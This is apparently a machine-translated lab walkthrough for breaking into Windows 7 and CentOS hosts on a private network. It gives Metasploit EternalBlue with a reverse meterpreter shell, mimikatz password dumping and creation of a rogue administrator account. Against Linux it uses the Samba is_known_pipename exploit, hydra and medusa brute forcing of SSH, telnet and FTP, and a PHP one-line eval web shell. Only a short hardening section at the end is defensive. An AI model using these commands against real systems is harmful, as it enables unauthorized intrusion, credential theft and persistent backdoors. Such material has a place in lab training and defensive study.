1, penetration windows7
1. Preparing the environment
Penetration machine: a kali ip: 192.168.191.153
Drone: a windows7 windows7ip: 192.168.191.130 contos6 ip: 192.168.191.167
2, open the machine permeation kali.
3, first performed using nmap to scan, and then analyze the results of the scan, if port 445 open, 445 priority attack.
nmap command: nmap -sV -T5 -n 192.168.191.130
Show results
1, the operating system: Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2,80,135,139,445,1801,2103,2107,49152,49153,49154,49155,49156,49157,49158 ports are opened.
4. Now we attack 445 port, msfconsole Metasploit open command in Kali (input msfconsole in the terminal).
I do not know the path to the search command: search ms17_010
Then run the command: use exploit / Windows / smb / ms17_010_eternalblue # use MS17_010 exploit program
set RHOST 192.168.191.130 # set the target host IP
set payload windows/x64/meterpreter/reverse_tcp #设置payload
#tcp not to use the following several payload
#set payload windows/x64/meterpreter/reverse_http
#set payload windows/x64/meterpreter/reverse_https
#set payload windows/x64/meterpreter/reverse_ftp
set LHOST 192.168.191.153 # Set the local host IP
show options # view the settings information
exploit # attack
The attack is successful, then use the command load mimikatz
Then use wdigest
000 found to have a user password is 111.
Then quit. Command: ctrl + c
When you quit the command: run getgui -e telnet Open 3389
Open a new terminal command: rdesktop ip
——————————————————————————————————————————————————————————————————————————
If you use the command wdigest found no users will create a user.
Next, create a user
First enter the shell
Create a user command net user username password / add
net localroup Administratros username / add
Because of his record of drones is not so Administratros group creation failed.
Successful
There is a newly opened terminal command: rdesktop ip
Penetration is complete, you can do whatever they want.
Windows7 and 2008 with exploit / windows / smb / ms17_010_eternalblue
Other versions use exploit / windows / smb / ms08_067_netapi
2, penetration linux
1. Preparing the environment
Penetration machine: a kali ip: 192.168.191.153
Drone: a windows7 windows7ip: 192.168.191.1 contos6 ip: 192.168.191.167
2, open the machine permeation kali.
3, first performed using nmap to scan, and then analyze the results of the scan, if port 445 open, 445 priority attack.
nmap command: nmap -sV -T5 -n 192.168.191.167
Show results
1, the operating system: Unix, Linux
2,21,22,23,80,139,445,3306 ports are opened.
4. Now we attack 445 port, msfconsole Metasploit open command in Kali (input msfconsole in the terminal).
I do not know the path to the search command: search is_known
Then run the command: use exploit / Linux / Samba / is_known_pipename
set RHOST 192.168.191.167 # set the target host IP
show options # view the settings information
exploit # attack
Returns a shell can be equal to the termination linux pleases.
2, ssh port 22
I do not know the path to the search command: search ssh_login
1, then run the command: use Auxiliary / Scanner / SSH / ssh_login
set rhost 192.168.191.168 # set the target host IP
set USERNAME root # Set the user name # set USERPASS_FILE dictionary
set PASS_FILE dictionary password # # set PASSWORD password
show options # view the settings information
exploit # attack
2、hydra -l root -P /root/123.txt 192.168.191.167 ssh
3、medusa -h 192.168.191.167 -u root -P /root/123.txt -M ssh
3, telnet # default root user can not log on port 23
I do not know the path to the search command: search telnet_login
1, then run the command: use Auxiliary / Scanner / the Telnet / telnet_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME admin # Set the user name # set USERPASS_FILE dictionary
set PASS_FILE dictionary password # # set PASSWORD password
show options # view the settings information
exploit # attack
2、hydra -l admin -P /root/123.txt 192.168.191.167 telnet
3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet
4, ftp port 21
I do not know the path to the search command: search ftp_login
1, then run the command: use Auxiliary / Scanner / the FTP / ftp_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME admin # Set the user name # set USERPASS_FILE dictionary
set PASS_FILE dictionary password # # set PASSWORD password
show options # view the settings information
exploit # attack
2、hydra -l admin -P /root/123.txt 192.168.191.167 ftp
3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet
5, mysql port 3306
I do not know the path to the search command: search mysql_login
1, then run the command: use Auxiliary / Scanner / MySQL / mysql_login
set rhost 192.168.191.167 # set the target host IP
set USERNAME root # Set the user name # set USERPASS_FILE dictionary
set PASS_FILE dictionary password # # set PASSWORD password
show options # view the settings information
exploit # attack
——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
6, http and mysql statement that looks at
Word Trojan <? Php @eval ($ _ GET [ "123"]);?>
1.php?123=system("cat /");
cmd interface cat /
mysql select load_file("/");
3, strengthening all the services except Windows 445 and linux445, http environment does not know how to write
1、ftp
vim /etc/vsftpd/vsftpd.conf
the remote login configuration file is closed, the whole yes no change is required.
service vsftpd reload
2、ssh
passwd root
Change the root password and delete common user
vim /etc/passwd
修改:lynn:x:500:500::/home/lynn:/bin/bash
为: lynn:x:500:500::/home/lynn:/sbin/nologin
Direct Line also deleted
3、telnet
telnet
vim /etc/passwd
Delete the average user
4、mysql
Change your password or disable remote access server mysql
To disable remote access server mysql, mysql can modify the configuration file: /etc/mysql/my.cnf
add [mysqld] the following sentence: bind-address = 127.0.0.1 is binding allows access to ip ip-based machines
change Password
use mysql;
set password for root@localhost = password('123');